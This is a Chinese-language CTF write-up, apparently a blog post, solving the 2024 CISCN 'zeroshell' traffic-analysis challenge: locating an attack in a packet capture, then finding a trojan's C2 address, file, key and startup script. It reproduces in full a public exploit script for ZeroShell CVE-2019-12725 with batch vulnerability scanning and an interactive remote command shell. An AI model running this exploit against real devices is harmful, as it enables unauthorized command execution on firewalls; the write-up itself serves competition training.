Loading

【CTF】2024-CISCN-长城杯-威胁检测与网络流量分析-zeroshell-WP

目录

附件下载:https://pan.baidu.com/s/1N58ui-5Ll4Zk7Ys4SUGFvw (提取码:GAME)

加密附件2e9c01da1d333cb8840968689ed3bc57.7z,解压密码为11b0526b-9cfb-4ac4-8a75-10ad9097b7ce

zeroshell_1

题目:从数据包中找出攻击者利用漏洞开展攻击的会话(攻击者执行了一条命令),写出该会话中设置的flag, 结果提交形式:flag{xxxxxxxxx}

Wireshark打开数据包,尝试搜索"exec"等关键字,发现一可疑http数据包,该请求url中存在有执行命令的情况。

image

对该http数据包追踪TCP数据流,发现该请求包的Referer字段有些异常。

image

进行base64解码,获取到了flag字符串:

image

zeroshell_2

题目:通过漏洞利用获取设备控制权限,然后查找设备上的flag文件,提取flag文件内容,结果提交形式:flag{xxxxxxxxxx}

根据手册搭建环境。其实通过zeroshell_1中定位的http数据流,发现请求中的type参数可以用来执行命令。搜一下zeroshell漏洞,确认是zeroshell防火墙的一个rce漏洞CVE-2019-12725。

随便找一个exp:https://github.com/gougou123-hash/CVE-2019-12725/blob/main/CVE-2019-12725.py

import requests
import re
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random


urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]

#随机ua
def get_ua():
	first_num = random.randint(55, 62)
	third_num = random.randint(0, 3200)
	fourth_num = random.randint(0, 140)
	os_type = [
		'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
		'(Macintosh; Intel Mac OS X 10_12_6)'
	]
	chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

	ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
				   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
				  )
	return ua


def check_vuln(url):
	url = parse.urlparse(url)
	url2=url.scheme + '://' + url.netloc 
	headers = {
		'User-Agent': get_ua(),
	}
	# data=base64.b64encode("eyJzZXQtcHJvcGVydHkiOnsicmVxdWVzdERpc3BhdGNoZXIucmVxdWVzdFBhcnNlcnMuZW5hYmxlUmVtb3RlU3RyZWFtaW5nIjp0cnVlfX0=")
	try:
		res2 = requests.get(url2 + '/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27',headers=headers,timeout=10,verify=False)
		if res2.status_code==200 and "uid" in res2.text:
			print("\033[32m[+]%s is vuln\033[0m" %url2)
			return 1
		else:
			print("\033[31m[-]%s is not vuln\033[0m" %url1)
	except Exception as e:
		print("\033[31m[-]%s is timeout\033[0m" %url2)


#cmdshell
def cmdshell(url):
	if check_vuln(url)==1:
		url = parse.urlparse(url)
		url1 = url.scheme + '://' + url.netloc + '/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A'
		while 1:
			shell = input("\033[35mcmd: \033[0m")
			if shell =="exit":
				sys.exit(0)
			else:
				headers = {
					'User-Agent': get_ua(),
					}
				try:
					res = requests.get(url1 + shell + '%0A%27',headers=headers,timeout=10,verify=False)
					if res.status_code==200 and len(res.text) != 0:
						vulntext=res.text.split('<html>')
						print("\033[32m%s\033[0m" %vulntext[0])
					else:
						print("\033[31m[-]%s Command execution failed !\033[0m" %url1)
				except Exception as e:
					print("\033[31m[-]%s is timeout!\033[0m" %url1)


#多线程
def multithreading(url_list, pools=5):
	works = []
	for i in url_list:
		# works.append((func_params, None))
		works.append(i)
	# print(works)
	pool = threadpool.ThreadPool(pools)
	reqs = threadpool.makeRequests(check_vuln, works)
	[pool.putRequest(req) for req in reqs]
	pool.wait()


if __name__ == '__main__':
	show = r'''

	 _____ _   _ _____       _____  _____  __   _____        __   _____  ___________  _____ 
	/  __ \ | | |  ___|     / __  \|  _  |/  | |  _  |      /  | / __  \|___  / __  \|  ___|
	| /  \/ | | | |__ ______`' / /'| |/' |`| | | |_| |______`| | `' / /'   / /`' / /'|___ \ 
	| |   | | | |  __|______| / /  |  /| | | | \____ |______|| |   / /    / /   / /      \ \
	| \__/\ \_/ / |___      ./ /___\ |_/ /_| |_.___/ /      _| |_./ /___./ /  ./ /___/\__/ /
	 \____/\___/\____/      \_____/ \___/ \___/\____/       \___/\_____/\_/   \_____/\____/ 
                                                                                        
                                                                                                                                                                                                                  
                                                                                                      
                              		                     CVE-2019-12725 By m2
	'''
	print(show + '\n')
	arg=ArgumentParser(description='CVE-2019-12725 By m2')
	arg.add_argument("-u",
						"--url",
						help="Target URL; Example:http://ip:port")
	arg.add_argument("-f",
						"--file",
						help="Target URL; Example:url.txt")
	arg.add_argument("-c",
					"--cmd",
					help="Target URL; Example:http://ip:port")
	args=arg.parse_args()
	url=args.url
	filename=args.file
	cmd=args.cmd
	print('[*]任务开始...')
	if url != None and cmd == None and filename == None:
		check_vuln(url)
	elif url == None and cmd == None and filename != None:
		start=time()
		for i in open(filename):
			i=i.replace('\n','')
			check_vuln(i)
		end=time()
		print('任务完成,用时%d' %(end-start))
	elif url == None and cmd != None and filename == None:
		cmdshell(cmd)

找flag文件,在/DB/_DB.001/flag和/Database/flag中都有,flag{c6045425-6e6e-41d0-be09-95682a4f65c4}。

image

zeroshell_3

题目:找出受控机防火墙设备中驻留木马的外联域名或IP地址,结果提交形式:flag{xxxx},如flag{www.abc.com} 或 flag{16.122.33.44}

netstat看一下,发现外部地址中有一个比较特别的ip地址,提交试了一下,就它了,flag{202.115.89.103}。

image

zeroshell_4

题目:请写出木马进程执行的本体文件的名称,结果提交形式:flag{xxxxx},仅写文件名不加路径

找了很久,最后在/tmp目录下找到一个可执行文件,应该是了,flag{.nginx}

image

zeroshell_5

题目:请提取驻留的木马本体文件,通过逆向分析找出木马样本通信使用的加密密钥,结果提交形式:flag{xxxx}

把.nginx文件下载下来,记得先把本地杀软关掉。

image

拖入IDA找密钥,搜关键字没有匹配的,但有几个字符串是比较可疑的。搜反联ip地址,似乎有发现了。

image

应该是密钥,flag{11223344qweasdzxc}

zeroshell_6

题目:请写出驻留木马的启动项,注意写出启动文件的完整路径。结果提交形式:flag{xxxx},如flag{/a/b/c}

在这里。。。

image

flag{/var/register/system/startup/scripts/nat/File}

posted @ 2024-12-17 16:14  smileleooo  阅读(89)  评论(0编辑  收藏  举报